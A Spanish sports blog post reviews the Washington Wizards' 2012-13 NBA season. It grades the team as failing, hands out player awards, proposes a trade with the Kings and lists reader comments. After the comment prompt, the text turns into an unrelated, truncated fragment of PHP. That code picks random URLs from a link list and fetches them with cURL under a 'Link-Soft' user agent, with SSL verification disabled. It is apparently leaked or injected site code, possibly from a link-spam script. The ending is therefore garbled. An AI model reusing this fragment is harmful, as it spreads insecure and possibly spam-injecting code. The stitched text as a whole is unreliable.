Washington Wizards: Suspenso

09 de July de 2013 por Sancho88

Ya lo dejábamos bien claro en el análisis previo: sin Wall, los Wizards no progresarían hacia ninguna parte esta temporada. Y así fue. Cuando John Wall regresó de su lesión de rodilla a principios de enero, el equipo firmó hasta final de temporada un rotundo 24-25, que de haberse mantenido constante previamente, les habría dado la octava plaza en los Playoffs del Este por delante de los Milwaukee Bucks. No obstante, el dato de victorias-derrotas antes del 12 de enero es para echarse a temblar. El equipo tan solo ganó 5 partidos (solo 1 en todo noviembre) y perdió 28, empezando la liga con un sangrante 0-12. Obviamente, ahí estuvo el truco. Y es que tras la vuelta de Wall solo un milagro les habría ayudado a levantar aquello.

Por eso deben suspender los Wizards. Finalmente pusieron lustro a una temporada que amenazaba con batir el récord negativo de los Bobcats del año pasado, pero les costó un mundo arrancar. Aquí les pedíamos 35 victorias y se quedaron en 29, perdiendo los últimos 6 juegos de manera consecutiva. Si el líder de la manada hubiera estado sano desde noviembre otro gallo cantaría a estas horas pero las circunstancias fueron las que fueron, y los Wizards demostraron que sin John Wall no son más que un títere en la NBA. Pero no solo Wall estuvo prácticamente media temporada en el dique seco (33 partidos fuera al final), sino que el rookie Bradley Beal se perdió 26 juegos y Nené otros 21. Con los tres hombres principales del equipo con tantos problemas físicos, Randy Wittman, el entrenador que llegó para sustituir a Flip Saunders, queda parcialmente exculpado del desastre de inicio de campaña. Realmente, las lesiones se cebaron con un equipo que, cuando jugó con todas sus piezas, demostró que pueden ser un ‘contender’ en la Conferencia Este.

 

Por lo demás, fue una temporada que nos dejó poquitas cosas. Como ya decimos, John Wall dio el salto cualitativo que le pedíamos a principio de temporada y ahora sí puede mirar de tú a tú a los mejores bases titulares de la liga. No es un top 5 en bases, pero sí un top 10, y eso es decir bastante teniendo en cuenta el gran nivel de bases actualmente en la NBA. Se le intuye una maduración en su juego. De hecho, este año perdió menos balones y lanzó a canasta con más confianza. De seguir así, no sería de extrañar ver a los Wizards en postemporada en próximas ediciones. Junto a él, Bradley Beal fue el complemento perfecto. El escolta ‘freshman’ de los Gators de Florida jugó una gran temporada como profesional y apuntó maneras de cara al futuro. De hecho, prácticamente ningún analista lo dejó fuera del quinteto ideal de los rookies. Tienen en Washington un tirador que promete y una pareja en el ‘backourt’ que por juventud y progresión se puede incluso asemejar a la formada por Curry y Thompson en los Warriors, aunque un peldaño por debajo actualmente. Veremos dentro de unos años, ya que Wall y Beal son muy jóvenes aún (22 y 20 años respectivamente). Son el presente y futuro de los Wizards.

El resto del equipo no mostró signos claros de ningún tipo. La zona nos decepcionó bastante, especialmente Jan Vesely, uno de los grandes fracasos de cualquier draft histórico de la NBA. Nené, por su parte, sigue sin explotar sus condiciones, y es evidente que ya nunca lo hará, con el agravante de que está a punto de cumplir 30 años y aún le faltan por cobrar 39 millones en 3 años con los Wizards (y muchos se quejan del nuevo contrato de Al Jefferson con los Bobcats, ¡Já!). Uno mira para atrás e incluso puede llegar a echar de menos a JaVale McGee en este caso. Quien lo diría. Y del relleno poco que destacar, demasiadas medianías y ningún jugador determinante. Ni Webster, ni Okafor, ni Seraphin, ni Ariza van a sacar a este equipo de pobres en el futuro. Pieza por pieza son buenos pegamentos para proyectos más ambiciosos, pero juntos son, con perdón, una banda de mediocres intentando ayudar a Wall y Beal. Lo curioso es que esta banda, si las lesiones lo hubieran permitido, habría estado con toda seguridad en los Playoffs del Este. Ya se sabe, siempre en rebajas.

PREMIOS

MVP: John Wall. Como comentamos, su importancia fue capital para rozar el 50% de victorias a partir de enero y meter el miedo en el cuerpo durante algunas semanas a los Bucks en la lucha por el octavo puesto. Su progresión va por buen camino y así lo demuestran sus 18,5 puntos, 4 rebotes, 7,6 asistencias y 1,3 robos en los 33 minutos de media que disputó esta temporada. Lástima no haber podido disfrutar de esta versión durante la racha de derrotas. Una lesión de rodilla del joven base cercenó las aspiraciones deportivas de los Wizards a principio de temporada.

Rookie: Bradley Beal. Llegaba para formar uno de los mejores ‘backourts’ de la liga junto a John Wall y lo ha conseguido. Con apenas 19 años su techo en la liga no parece demasiado predecible pero ya se ha consolidado como titular en un aspirante próximo a Playoffs en el Este,  eso merece nuestros respetos. Pese a tener pocos centímetros para su posición, Beal lo compensa con un físico privilegiado, muelles para hundirla y un instinto de anotador que confirma los buenos informes que había sobre él el año pasado. De él depende ahora mejorar su defensa y convertirse en una apuesta segura para cualquier equipo de la liga, o relajarse y ser un tirador capaz de anotar 20 puntos por noche a costa de unos porcentajes paupérrimos, como le ha pasado esta temporada. Será interesante ver la evolución de Beal de cara a la próxima temporada. De momento, este año se ha ganado por derecho propio un lugar en el mejor quinteto de rookies.

Sorpresa: Martell Webster. Sorprendente buena temporada de un jugador que hace tiempo ya habíamos enterrado en el santuario de jóvenes promesas. Webster le ganó la titularidad a Trevor Ariza y completó la mejor temporada de su vida. Sus grandes porcentajes en el tiro exterior y su tenacidad defensiva le han hecho merecedor de un bonito contrato 22×4 con los Wizards. Esperemos que ahora no se eche la siesta y siga aportando defensa, intensidad y amenaza en tiros lejanos en el proyecto de Randy Wittman.

Decepción: Jan Vesely. No solo es el mayor fracaso de su promoción, sino, quizá, uno de los mayores fracasos en el draft de la última década. Elegido en el puesto número 6 de la lotería por los Wizards hace dos temporadas, este hombre no solo no ha logrado mejorar sus prestaciones esta temporada, donde muchos lo veíamos como un proyecto para el MIP, sino que se ha derrumbado hasta diluirse como un azucarillo. Vesely tiene pánico a tirar tiros libres, llora y le dan ataques de ansiedad incluso, ya que toda la grada rival se suele cebar con él. Y, además, la criatura encima se defiende. Hace un mes soltó aquello de “quieren que juegue con un cuerpo como el de Pekovic, y me niego porque bla bla blí, bla bla bla”. Pues claro animal de bellota, para eso te pagan y te eligieron por encima de Kemba Walker, Klay Thompson, Kawhi Leonard o Vucevic. Total, que ya ha pedido su traspaso. Nadie en la NBA le quiere ni le querrá. Que vuelva a la liga checa. Allí será una estrella, y si no, todavía su padre guarda una canasta en el jardín de su casa, donde probablemente será el mejor aunque dicen que su perro ha estado entrenándose duro. Ese es su objetivo, no meter canastas en su propio aro y no molestar a los que tienen su misma camiseta. Con eso podría valer.

Esfuerzo en vano: También John Wall. El MVP de los Wizards ofreció su mejor baloncesto desde que llegó a la liga, rozó el 50% de victorias en los 49 partidos que disputó, pero eso no le valió de nada a los Wizards para meterse en los Playoffs. No obstante, es encomiable el esfuerzo de Wall. Va por el buen camino.

JUGANDO A GM

No fue desastrosa la temporada anterior. Wittman, a pesar de las 29 victorias, ha conseguido crear un equipo sólido defensivamente hablando, con pegamento industrial como Okafor, Webster, Ariza o Booker, pero al equipo le falta claramente una referencia en la pintura para anotar. Nené no ha hecho lo suficiente y es una pena porque cualidades no le faltan al pívot brasileño. Él y Okafor formarán un juego interior de 27,5 millones de dólares para la próxima campaña pero da la sensación de que ninguno de los dos justifica con sus números esos salarios. Además, no han tenido carácter suficiente para echarse el equipo a la espalda cuando Wall no ha estado y eso es preocupante, pues si no son capaces de liderar un proyecto ni siquiera en los Wizards, no sé muy bien qué pueden liderar estos dos. Pero es complicado deshacerse de sus contratos. Okafor no tanto, ya que es expiring y podría participar en algún cambio de cromos, pero Nené tiene un contrato garantizado hasta junio de 2016 a razón de 13 millones por temporada. Parece que ellos dos serán un año más la espina dorsal en la pintura, pero como dúo dejan mucho que desear. Muy difícil traspasarles. Al menos en el draft podrían haber ido a por Noel o Len. No se entiende muy bien que no hayan reforzado las carencias en la zona y hayan elegido a Otto Porter, que si bien es cierto que viene para ser una pieza más en el castillo construido sobre Wall y Beal, y será el alero titular del equipo, también es cierto que su elección no tiene mucho sentido teniendo a Ariza y habiendo renovado a Martell Webster.

Por eso, e insisto una vez más por el camino sacramentino, los Wizards podrían hacer un buen negocio con los Kings. Martell Webster + Emeka Okafor a cambio de Marcus Thornton + Chuck Hayes + Patrick Patterson. Con este traspaso, los Wizards obtendrían un escolta suplente para Bradley Beal (Garrett Temple no tiene nivel), dejarían sitio para la evolución de Otto Porter con la salida de Webster y se quitarían de en medio a un jugador que no les da un plus en ataque como Okafor. Sería una apuesta ofensiva, pues además obtendrían a Patterson, que podría complementarse bastante bien con Nené. Y así los Kings cubrirían sus carencias en el puesto de alero con Webster y de pívot suplente de Cousins con Okafor, que incluso podría complementarse con Cousins como titular. Ataque para los Wizards, que es lo que les hace falta, y defensa para Sacramento. Todos saldrían ganando

Por lo demás, está muy bien el fichaje de Eric Maynor como suplente de John Wall, pues es un jugador inteligente, intenso en defensa y con buena mano desde fuera, además no exento de juego al contraataque. En la zona, como decimos, hay overbooking de jugadores intrascendentes (Vesely, Booker, Singleton), y solo Kevin Seraphin aparece como una buena opción para complementar a Okafor y Nené. Como decimos, Patterson podría ser un buen fichaje para los Wizards.

Y analizando un poco las elecciones de draft, parecía que el puesto de alero estaba ‘cojo’ en el equipo pero ahora tienen 3. Otto Porter es la gran apuesta del draft. Los Wizards volvieron a tener la tercera bola y escogieron al polivalente alero de Georgetown. El problema es que Trevor Ariza se acogió a su Player Option y el equipo incomprensiblemente renovó a Webster. Es evidente que necesitan aligerar peso para que Porter pueda desarrollarse en condiciones. Si no se movieran los Wizards, es posible que Webster se adapte a la posición de 2 como ya lo hizo en su etapa de Portland y Minnesota, y que busquen jugar un ‘small ball’ con Otto Porter como ‘4’ abierto. Para eso el alero debería ganar músculo, aunque parece que fundamentos, ética de trabajo y disciplina no le faltan. Por último, el equipo movió a Philadelphia a su segunda ronda Nate Wolters a cambio del escolta Glen Rice Jr., hijo del mítico jugador de los Lakers. A ver si las enchufa como su padre.

No obstante, siendo fríos, y analizando la situación sin mis movimientos de videoconsola, podríamos sentenciar que al equipo le hace falta un escolta suplente, aligerar la nómina de aleros y ala-pívots intrascendentes, y encontrar un verdadero líder en la zona, ya que Nené ha demostrado no serlo. Complicada aventura la de los Wizards si no hacen algún movimiento más. Serán candidatos a primera ronda, pero poco más.

Así quedaría el equipo conmigo como GM:

Bases: John Wall, Eric Maynor
Escoltas: Bradley Beal, Marcus Thornton, Glen Rice Jr., Garrett Temple
Aleros: Otto Porter, Trevor Ariza
Ala-pívots: Patrick Patterson, Trevor Booker, Chris Singleton
Pívots: Nené Hilario, Kevin Seraphin, Chuck Hayes

Comenta

7 comentarios a esta entrada

  1. rumbero dice:
    #1

    ¿Muy benevolente con Vesely no? xD Merecido se lo tiene
    Poco más que añadir. Miedito da Webster y su 22×4 y esa pareja interior con más nombre que calidad. Aún así y siempre con Wall sano deberían tener opciones de PO esta temporada. A ver como sigue la progresión de Beal que lejos de acusar el rookie wall jugó casi mejor en enero y febrero, antes de lesionarse.

    Y ese trade con los Kings suena bien y más si estos van finalmente a por Ellis y tienen que hacerle hueco a McLemore. Les quedaría un equipo mucho más equilibrado

      Citar

  2. Esteban dice:
    #2

    Te haces demasiada mala sangre por lo de Ariza, Webster y Porter

    ariza es expiring y seguramente sera traspasado a mitad de año, mientras que webster es un reaseguro por si a Porter le falta una golpe de horno aun

    Okafor jugo una gran temporada, obivamente no esta a la altura de haber sido elegido ropokie del año sobre howard, pero promedio casi un doble/doble y es un expiring jugosisisisisisisismo

    wall, beal, porter y nene, es una gran base sobre la cual construir, el resto deje mucho que desear, pero repito, entre ariza, okafor y vasely dejaran 25 millones de expiring este año,

    por ende es probable que los wizards se metan a PO este año con chavales como wall, beal y porter, y ademas tenga 25 millones debajo del tope el año proximo

    no tienen el futuro de OKC pero no es tan negro como algunos creen

      Citar

  3. Sancho88 dice:
    #3

    Simon no, Sancho88, jejeje

      Citar

  4. txusma dice:
    #4

    Sancho88:
    Simon no, Sancho88, jejeje

    En serio, dadme de una vez las vacaciones…

      Citar

  5. Sancho88 dice:
    #5

    Como?

      Citar

  6. txusma dice:
    #6

    Sancho88:
    Como?

    Que estoy fatal últimamente. Necesito las vacaciones ya… No me las podéis dar vosotros? 😉

      Citar

  7. Sancho88 dice:
    #7

    Venga, que solo quedan 9!! Si quieres yo me puedo editar los míos, no hay problema joe

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>